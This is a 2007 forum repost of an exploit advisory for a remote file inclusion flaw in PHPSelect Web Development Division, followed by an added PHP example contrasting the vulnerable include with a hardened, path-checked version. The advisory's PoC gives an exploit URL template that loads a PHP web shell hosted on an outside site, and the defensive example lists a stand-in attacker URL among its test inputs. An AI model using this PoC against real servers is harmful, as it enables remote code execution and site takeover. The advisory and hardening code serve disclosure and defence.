Ras Posted June 17, 2007

+-------------------------------------------------------------------+
PHPSelect Web Development Division <= Remote File Inclusion
+--------------------------------------------------------------------+
+
+ Affected Software .: PHPSelect Web Development Division
+ Vendor ............: http://www.phpselect.com/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------+
+
+ Code index.php3:
+
+ .....
+ include("$Application_Root/modules/include/global_settings");
+ .....
+
+--------------------------------------------------------------------+
+
+ $Application_Root is not properly sanitized before being used.
+ The bug is in the "PDD" Package for PHPSelect Web Development Division.
+
+--------------------------------------------------------------------+
+
+ Solution:
+ Add this line to your php-file:
+
+ $Application_Root = "user/dir"; // Your root path
+
+--------------------------------------------------------------------+
+ PoC:
+ Place a PHPShell on a remote location:
+ http://wdzone.net/sh.txt?
+
+ http://[target]/index.php3?Application_Root=http://phpshell
+
+--------------------------------------------------------------------+
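The advisory's fix is to assign $Application_Root server-side so the include path can no longer come from the request. The following is an added example written for this post, not code from the advisory or from PHPSelect: it puts the vulnerable include pattern quoted above beside a hardened form that pins the root to a fixed directory and verifies, after realpath(), that the resolved settings file still lies inside it. The install path, the function names and the is_safe_root_value() check are assumptions; only the module path "modules/include/global_settings" comes from the advisory.

```php
<?php
// Added example (not code from the advisory or from PHPSelect).
// The module path below follows the advisory; everything else is assumed.

// Vulnerable pattern, as described in the advisory: with register_globals
// enabled (common on PHP 4 installs of that era) a request parameter named
// Application_Root becomes this variable, and with allow_url_fopen /
// allow_url_include enabled include() will fetch a remote URL.
function vulnerable_settings_path(string $applicationRoot): string
{
    // Whatever the request supplied is concatenated unchecked.
    return "$applicationRoot/modules/include/global_settings";
}

// Hardened form: the root is a server-side constant, never taken from the
// request, and the resulting path must resolve inside that directory.
define('APPLICATION_ROOT', '/var/www/phpselect'); // assumed install path

function hardened_settings_path(): string
{
    $base      = realpath(APPLICATION_ROOT);
    $candidate = realpath(APPLICATION_ROOT . '/modules/include/global_settings');
    if ($base === false || $candidate === false) {
        throw new RuntimeException('application root or settings file missing');
    }
    // realpath() resolves symlinks and "..", so a prefix check is meaningful.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('settings file escapes the application root');
    }
    return $candidate;
}

// Defensive check for a legacy handler that still receives the value from
// outside: reject stream wrappers (http://, ftp://, php://, data:// ...),
// NUL bytes and parent-directory traversal, then allow only a plain
// relative path made of safe characters.
function is_safe_root_value(string $value): bool
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
        return false;
    }
    if (strpos($value, "\0") !== false || strpos($value, '..') !== false) {
        return false;
    }
    return (bool) preg_match('#^[A-Za-z0-9_./-]+$#', $value);
}

// Constructed inputs illustrating the difference; none of these are from
// the advisory.
var_dump(is_safe_root_value('user/dir'));
var_dump(is_safe_root_value('http://attacker.example/'));
var_dump(is_safe_root_value('../../etc'));
```

The real fix is the constant plus the realpath() containment check; the string filter is only a second layer for code paths that cannot be rewritten yet. On the server side, the same class of bug is blunted by setting allow_url_include=Off and register_globals=Off in php.ini, so that a request parameter cannot become $Application_Root in the first place and include() cannot fetch over HTTP even if it did.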